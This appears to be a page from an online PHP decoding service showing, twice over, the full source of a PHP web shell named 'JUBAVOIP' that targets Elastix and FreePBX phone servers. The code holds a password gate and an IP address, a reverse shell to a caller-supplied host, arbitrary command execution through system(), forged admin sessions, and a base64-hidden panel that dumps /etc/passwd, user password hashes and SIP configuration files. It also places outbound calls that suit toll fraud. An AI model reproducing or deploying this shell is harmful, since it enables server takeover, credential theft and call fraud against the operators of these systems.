Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
session_start(); if (isset($_REQUEST['md5']) && md5($_REQUEST['md5']) == '0bc02e3d57d7a4a..
Decoded Output download
session_start();
if (isset($_REQUEST['md5']) && md5($_REQUEST['md5']) == '0bc02e3d57d7a4a0d31becd82e45eebf') {
$_SESSION['JUBAVOIP'] = 'logged';
}
if (!isset($_SESSION['JUBAVOIP'])) {
echo '<form action="" method="post">';
echo '<input type="text" name="md5" size="32" />';
echo '<input type="submit" name="JUBAVOIP" value="JUBAVOIP" /> ';
echo '</form>';
echo '<? -- JUBAVOIP:147.135.27.31 -- ?>';
exit();
}
if (isset($_REQUEST['ip']) && isset($_REQUEST['port'])) {
$sock = fsockopen($_REQUEST['ip'], $_REQUEST['port']);
$proc = proc_open("python -c 'import pty; pty.spawn(\"bash\")'", array(0 => $sock, 1 => $sock, 2 => $sock), $pipes);
}
if (isset($_REQUEST['admin']) && $_REQUEST['admin'] == 'Elastix') {
session_destroy();
session_name("elastixSession");
session_start();
$_SESSION['JUBAVOIP'] = 'logged';
include_once "/var/www/html/libs/paloSantoDB.class.php";
include_once "/var/www/html/libs/paloSantoACL.class.php";
$pDB = new paloDB("sqlite3:////var/www/db/acl.db");
$db = $pDB->fetchTable("SELECT name, md5_password,extension from acl_user WHERE id ='1'");
$_SESSION['elastix_user'] = $db[0][0];
$_SESSION['elastix_pass'] = $db[0][1];
header("Location: /index.php");
}
if (isset($_REQUEST['admin']) && $_REQUEST['admin'] == 'Freepbx') {
if (!@include_once(getenv('FREEPBX_CONF') ? getenv('FREEPBX_CONF') : '/etc/freepbx.conf')) {
include_once('/etc/asterisk/freepbx.conf');
}
require_once('/var/www/html/admin/libraries/ampuser.class.php');
$_SESSION['AMP_user'] = new ampuser($amp_conf['AMPDBUSER']);
$_SESSION['AMP_user']->setAdmin();
header("Location: /admin/config.php");
}
if (!isset($_REQUEST['q'])) {
echo base64_decode('PGgxIHN0eWxlPSJ0ZXh0LWFsaWduOiBjZW50ZXI7Ij5USEVZIENBTEwgTUUgSlVCQVZPSVAgOik8L2gxPgo8Zm9ybSBhY3Rpb249IiIgbWV0aG9kPSJwb3N0Ij4KICAgIDxiPkNBTEw8L2I+IDxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJjb250ZXh0IiB2YWx1ZT0iYXN0ZXJpc2stb3V0Y2FsbHMiIC8+CiAgICA8aW5wdXQgdHlwZT0idGV4dCIgbmFtZT0idGltZSIgdmFsdWU9IjYwIiAvPgogICAgPGlucHV0IHR5cGU9InRleHQiIG5hbWU9InBycyIgdmFsdWU9IjAwIiAvPgogICAgPGlucHV0IHR5cGU9InRleHQiIG5hbWU9Im51bSIgcGxhY2Vob2xkZXI9Im51bWJlciIgLz4KICAgIDxpbnB1dCB0eXBlPSJzdWJtaXQiIG5hbWU9ImNhbGwiIHZhbHVlPSJjYWxsIiAvPgo8L2Zvcm0+PGJyIC8+Cjxmb3JtIGFjdGlvbj0iIiBtZXRob2Q9InBvc3QiPgogICAgPGI+UkVWRVJTRSBTSEVMTDwvYj4KICAgIDxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJpcCIgcGxhY2Vob2xkZXI9IjAuMC4wLjAiIC8+CiAgICA8aW5wdXQgdHlwZT0idGV4dCIgbmFtZT0icG9ydCIgdmFsdWU9IjgwODAiIC8+CiAgICA8aW5wdXQgdHlwZT0ic3VibWl0IiBuYW1lPSJjYWxsIiB2YWx1ZT0iQ29ubmVjdCIgLz4KPC9mb3JtPgo8YnIgLz4KPGZvcm0gYWN0aW9uPSIiIG1ldGhvZD0icG9zdCI+CiAgICA8Yj5DTUQ8L2I+CiAgICA8aW5wdXQgdHlwZT0idGV4dCIgbmFtZT0iY21kIiBzaXplPSc4MCcgLz4KICAgIDxpbnB1dCB0eXBlPSJzdWJtaXQiIG5hbWU9ImV4ZWN1dGUiIHZhbHVlPSJFeGVjdXRlIiAvPgogICAgPGhyIC8+CiAgICA8YnV0dG9uIHR5cGU9InN1Ym1pdCIgbmFtZT0iY21kIiB2YWx1ZT0ibHMgLWxhIj5MaXN0IEZpbGU8L2J1dHRvbj4KICAgIDxidXR0b24gdHlwZT0ic3VibWl0IiBuYW1lPSJjbWQiIHZhbHVlPSJwcyAtYXV4IC0tZm9yZXN0Ij5Qcm9jY2VzcyBMaXN0PC9idXR0b24+CiAgICA8YnV0dG9uIHR5cGU9InN1Ym1pdCIgbmFtZT0iY21kIiB2YWx1ZT0nbXlzcWwgLS11c2VyPSJyb290IiAtLXBhc3N3b3JkPSIiIC0tZGF0YWJhc2U9ImFzdGVyaXNrIiAtZSAic2VsZWN0ICogZnJvbSBhbXB1c2VycyBcRzsiOyc+QW1wdXNlcnM8L2J1dHRvbj4KICAgIDxidXR0b24gdHlwZT0ic3VibWl0IiBuYW1lPSJjbWQiIHZhbHVlPSJjYXQgL2V0Yy9wYXNzd2QgfCBncmVwIHNoJCI+UGFzc3dkPC9idXR0b24+CiAgICA8YnV0dG9uIHR5cGU9InN1Ym1pdCIgbmFtZT0iY21kIiB2YWx1ZT0iY3JvbnRhYiAtbCI+Q3JvbnRhYjwvYnV0dG9uPgogICAgPGJ1dHRvbiB0eXBlPSJzdWJtaXQiIG5hbWU9ImNtZCIgdmFsdWU9ImFzdGVyaXNrIC1yeCAnY29yZSBzaG93IGNoYW5uZWxzJyI+U2hvdyBDaGFubmVsczwvYnV0dG9uPgogICAgPGJ1dHRvbiB0eXBlPSJzdWJtaXQiIG5hbWU9ImNtZCIgdmFsdWU9ImFzdGVyaXNrIC1yeCAnc2lwIHNob3cgcGVlcnMnIj5TaXAgUGVlcnM8L2J1dHRvbj4KICAgIDxidXR0b24gdHlwZT0ic3VibWl0IiBuYW1lPSJjbWQiIHZhbHVlPSJhc3RlcmlzayAtcnggJ3Bqc2lwIHNob3cgcmVnaXN0cmF0aW9ucyciPlBKU2lwIFJlZ2lzdHJhdGlvbnM8L2J1dHRvbj4KICAgIDxidXR0b24gdHlwZT0ic3VibWl0IiBuYW1lPSJjbWQiIHZhbHVlPSJjYXQgL2V0Yy9hc3Rlcmlzay9wanNpcCoiPlBKU0lQPC9idXR0b24+CiAgICA8YnV0dG9uIHR5cGU9InN1Ym1pdCIgbmFtZT0iY21kIiB2YWx1ZT0iY2F0IC9ldGMvYXN0ZXJpc2svc2lwX2FkZGl0aW9uYWwuY29uZiI+U0lQIEFkZGl0aW9uYWw8L2J1dHRvbj4KICAgIDxidXR0b24gdHlwZT0ic3VibWl0IiBuYW1lPSJjbWQiIHZhbHVlPSJjYXQgL2V0Yy9hc3Rlcmlzay9leHRlbnNpb25zX2N1c3RvbS5jb25mIj5FeHRlbnNpb25zPC9idXR0b24+CiAgICA8YnV0dG9uIHR5cGU9InN1Ym1pdCIgbmFtZT0iY21kIiB2YWx1ZT0iY2F0IC9ldGMvZWxhc3RpeC5jb25mIj5FbGFzdGl4LmNvbmY8L2J1dHRvbj4KICAgIDxidXR0b24gdHlwZT0ic3VibWl0IiBuYW1lPSJjbWQiIHZhbHVlPSJjYXQgL2V0Yy9pc3NhYmxlLmNvbmYiPklzc2FibGUuY29uZjwvYnV0dG9uPgogICAgPGJ1dHRvbiB0eXBlPSJzdWJtaXQiIG5hbWU9ImNtZCIgdmFsdWU9ImNhdCAvZXRjL2FtcG9ydGFsLmNvbmYiPmFtcG9ydGFsLmNvbmY8L2J1dHRvbj4KPC9mb3JtPgo8Zm9ybSBhY3Rpb249IiIgbWV0aG9kPSJnZXQiPgogICAgPGlucHV0IHR5cGU9InN1Ym1pdCIgbmFtZT0iYWRtaW4iIHZhbHVlPSJFbGFzdGl4IiAvPgogICAgPGlucHV0IHR5cGU9InN1Ym1pdCIgbmFtZT0iYWRtaW4iIHZhbHVlPSJGcmVlcGJ4IiAvPgo8L2Zvcm0+CjxwcmU+');
echo '<pre>';
}
if (isset($_REQUEST['cmd'])) {
echo system($_REQUEST['cmd']);
}
if (isset($_REQUEST['call'])) {
system('asterisk -rx "channel originate Local/' . $_REQUEST['prs'] . $_REQUEST['num'] . '@' . $_REQUEST['context'] . ' application wait ' . $_REQUEST['time'] . '"');
}
Did this file decode correctly?
Original Code
session_start();
if (isset($_REQUEST['md5']) && md5($_REQUEST['md5']) == '0bc02e3d57d7a4a0d31becd82e45eebf') {
$_SESSION['JUBAVOIP'] = 'logged';
}
if (!isset($_SESSION['JUBAVOIP'])) {
echo '<form action="" method="post">';
echo '<input type="text" name="md5" size="32" />';
echo '<input type="submit" name="JUBAVOIP" value="JUBAVOIP" /> ';
echo '</form>';
echo '<? -- JUBAVOIP:147.135.27.31 -- ?>';
exit();
}
if (isset($_REQUEST['ip']) && isset($_REQUEST['port'])) {
$sock = fsockopen($_REQUEST['ip'], $_REQUEST['port']);
$proc = proc_open("python -c 'import pty; pty.spawn(\"bash\")'", array(0 => $sock, 1 => $sock, 2 => $sock), $pipes);
}
if (isset($_REQUEST['admin']) && $_REQUEST['admin'] == 'Elastix') {
session_destroy();
session_name("elastixSession");
session_start();
$_SESSION['JUBAVOIP'] = 'logged';
include_once "/var/www/html/libs/paloSantoDB.class.php";
include_once "/var/www/html/libs/paloSantoACL.class.php";
$pDB = new paloDB("sqlite3:////var/www/db/acl.db");
$db = $pDB->fetchTable("SELECT name, md5_password,extension from acl_user WHERE id ='1'");
$_SESSION['elastix_user'] = $db[0][0];
$_SESSION['elastix_pass'] = $db[0][1];
header("Location: /index.php");
}
if (isset($_REQUEST['admin']) && $_REQUEST['admin'] == 'Freepbx') {
if (!@include_once(getenv('FREEPBX_CONF') ? getenv('FREEPBX_CONF') : '/etc/freepbx.conf')) {
include_once('/etc/asterisk/freepbx.conf');
}
require_once('/var/www/html/admin/libraries/ampuser.class.php');
$_SESSION['AMP_user'] = new ampuser($amp_conf['AMPDBUSER']);
$_SESSION['AMP_user']->setAdmin();
header("Location: /admin/config.php");
}
if (!isset($_REQUEST['q'])) {
echo base64_decode('PGgxIHN0eWxlPSJ0ZXh0LWFsaWduOiBjZW50ZXI7Ij5USEVZIENBTEwgTUUgSlVCQVZPSVAgOik8L2gxPgo8Zm9ybSBhY3Rpb249IiIgbWV0aG9kPSJwb3N0Ij4KICAgIDxiPkNBTEw8L2I+IDxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJjb250ZXh0IiB2YWx1ZT0iYXN0ZXJpc2stb3V0Y2FsbHMiIC8+CiAgICA8aW5wdXQgdHlwZT0idGV4dCIgbmFtZT0idGltZSIgdmFsdWU9IjYwIiAvPgogICAgPGlucHV0IHR5cGU9InRleHQiIG5hbWU9InBycyIgdmFsdWU9IjAwIiAvPgogICAgPGlucHV0IHR5cGU9InRleHQiIG5hbWU9Im51bSIgcGxhY2Vob2xkZXI9Im51bWJlciIgLz4KICAgIDxpbnB1dCB0eXBlPSJzdWJtaXQiIG5hbWU9ImNhbGwiIHZhbHVlPSJjYWxsIiAvPgo8L2Zvcm0+PGJyIC8+Cjxmb3JtIGFjdGlvbj0iIiBtZXRob2Q9InBvc3QiPgogICAgPGI+UkVWRVJTRSBTSEVMTDwvYj4KICAgIDxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJpcCIgcGxhY2Vob2xkZXI9IjAuMC4wLjAiIC8+CiAgICA8aW5wdXQgdHlwZT0idGV4dCIgbmFtZT0icG9ydCIgdmFsdWU9IjgwODAiIC8+CiAgICA8aW5wdXQgdHlwZT0ic3VibWl0IiBuYW1lPSJjYWxsIiB2YWx1ZT0iQ29ubmVjdCIgLz4KPC9mb3JtPgo8YnIgLz4KPGZvcm0gYWN0aW9uPSIiIG1ldGhvZD0icG9zdCI+CiAgICA8Yj5DTUQ8L2I+CiAgICA8aW5wdXQgdHlwZT0idGV4dCIgbmFtZT0iY21kIiBzaXplPSc4MCcgLz4KICAgIDxpbnB1dCB0eXBlPSJzdWJtaXQiIG5hbWU9ImV4ZWN1dGUiIHZhbHVlPSJFeGVjdXRlIiAvPgogICAgPGhyIC8+CiAgICA8YnV0dG9uIHR5cGU9InN1Ym1pdCIgbmFtZT0iY21kIiB2YWx1ZT0ibHMgLWxhIj5MaXN0IEZpbGU8L2J1dHRvbj4KICAgIDxidXR0b24gdHlwZT0ic3VibWl0IiBuYW1lPSJjbWQiIHZhbHVlPSJwcyAtYXV4IC0tZm9yZXN0Ij5Qcm9jY2VzcyBMaXN0PC9idXR0b24+CiAgICA8YnV0dG9uIHR5cGU9InN1Ym1pdCIgbmFtZT0iY21kIiB2YWx1ZT0nbXlzcWwgLS11c2VyPSJyb290IiAtLXBhc3N3b3JkPSIiIC0tZGF0YWJhc2U9ImFzdGVyaXNrIiAtZSAic2VsZWN0ICogZnJvbSBhbXB1c2VycyBcRzsiOyc+QW1wdXNlcnM8L2J1dHRvbj4KICAgIDxidXR0b24gdHlwZT0ic3VibWl0IiBuYW1lPSJjbWQiIHZhbHVlPSJjYXQgL2V0Yy9wYXNzd2QgfCBncmVwIHNoJCI+UGFzc3dkPC9idXR0b24+CiAgICA8YnV0dG9uIHR5cGU9InN1Ym1pdCIgbmFtZT0iY21kIiB2YWx1ZT0iY3JvbnRhYiAtbCI+Q3JvbnRhYjwvYnV0dG9uPgogICAgPGJ1dHRvbiB0eXBlPSJzdWJtaXQiIG5hbWU9ImNtZCIgdmFsdWU9ImFzdGVyaXNrIC1yeCAnY29yZSBzaG93IGNoYW5uZWxzJyI+U2hvdyBDaGFubmVsczwvYnV0dG9uPgogICAgPGJ1dHRvbiB0eXBlPSJzdWJtaXQiIG5hbWU9ImNtZCIgdmFsdWU9ImFzdGVyaXNrIC1yeCAnc2lwIHNob3cgcGVlcnMnIj5TaXAgUGVlcnM8L2J1dHRvbj4KICAgIDxidXR0b24gdHlwZT0ic3VibWl0IiBuYW1lPSJjbWQiIHZhbHVlPSJhc3RlcmlzayAtcnggJ3Bqc2lwIHNob3cgcmVnaXN0cmF0aW9ucyciPlBKU2lwIFJlZ2lzdHJhdGlvbnM8L2J1dHRvbj4KICAgIDxidXR0b24gdHlwZT0ic3VibWl0IiBuYW1lPSJjbWQiIHZhbHVlPSJjYXQgL2V0Yy9hc3Rlcmlzay9wanNpcCoiPlBKU0lQPC9idXR0b24+CiAgICA8YnV0dG9uIHR5cGU9InN1Ym1pdCIgbmFtZT0iY21kIiB2YWx1ZT0iY2F0IC9ldGMvYXN0ZXJpc2svc2lwX2FkZGl0aW9uYWwuY29uZiI+U0lQIEFkZGl0aW9uYWw8L2J1dHRvbj4KICAgIDxidXR0b24gdHlwZT0ic3VibWl0IiBuYW1lPSJjbWQiIHZhbHVlPSJjYXQgL2V0Yy9hc3Rlcmlzay9leHRlbnNpb25zX2N1c3RvbS5jb25mIj5FeHRlbnNpb25zPC9idXR0b24+CiAgICA8YnV0dG9uIHR5cGU9InN1Ym1pdCIgbmFtZT0iY21kIiB2YWx1ZT0iY2F0IC9ldGMvZWxhc3RpeC5jb25mIj5FbGFzdGl4LmNvbmY8L2J1dHRvbj4KICAgIDxidXR0b24gdHlwZT0ic3VibWl0IiBuYW1lPSJjbWQiIHZhbHVlPSJjYXQgL2V0Yy9pc3NhYmxlLmNvbmYiPklzc2FibGUuY29uZjwvYnV0dG9uPgogICAgPGJ1dHRvbiB0eXBlPSJzdWJtaXQiIG5hbWU9ImNtZCIgdmFsdWU9ImNhdCAvZXRjL2FtcG9ydGFsLmNvbmYiPmFtcG9ydGFsLmNvbmY8L2J1dHRvbj4KPC9mb3JtPgo8Zm9ybSBhY3Rpb249IiIgbWV0aG9kPSJnZXQiPgogICAgPGlucHV0IHR5cGU9InN1Ym1pdCIgbmFtZT0iYWRtaW4iIHZhbHVlPSJFbGFzdGl4IiAvPgogICAgPGlucHV0IHR5cGU9InN1Ym1pdCIgbmFtZT0iYWRtaW4iIHZhbHVlPSJGcmVlcGJ4IiAvPgo8L2Zvcm0+CjxwcmU+');
echo '<pre>';
}
if (isset($_REQUEST['cmd'])) {
echo system($_REQUEST['cmd']);
}
if (isset($_REQUEST['call'])) {
system('asterisk -rx "channel originate Local/' . $_REQUEST['prs'] . $_REQUEST['num'] . '@' . $_REQUEST['context'] . ' application wait ' . $_REQUEST['time'] . '"');
}
Function Calls
None |
Stats
MD5 | 3f111ea4254fa156c2d8677686a0728b |
Eval Count | 0 |
Decode Time | 49 ms |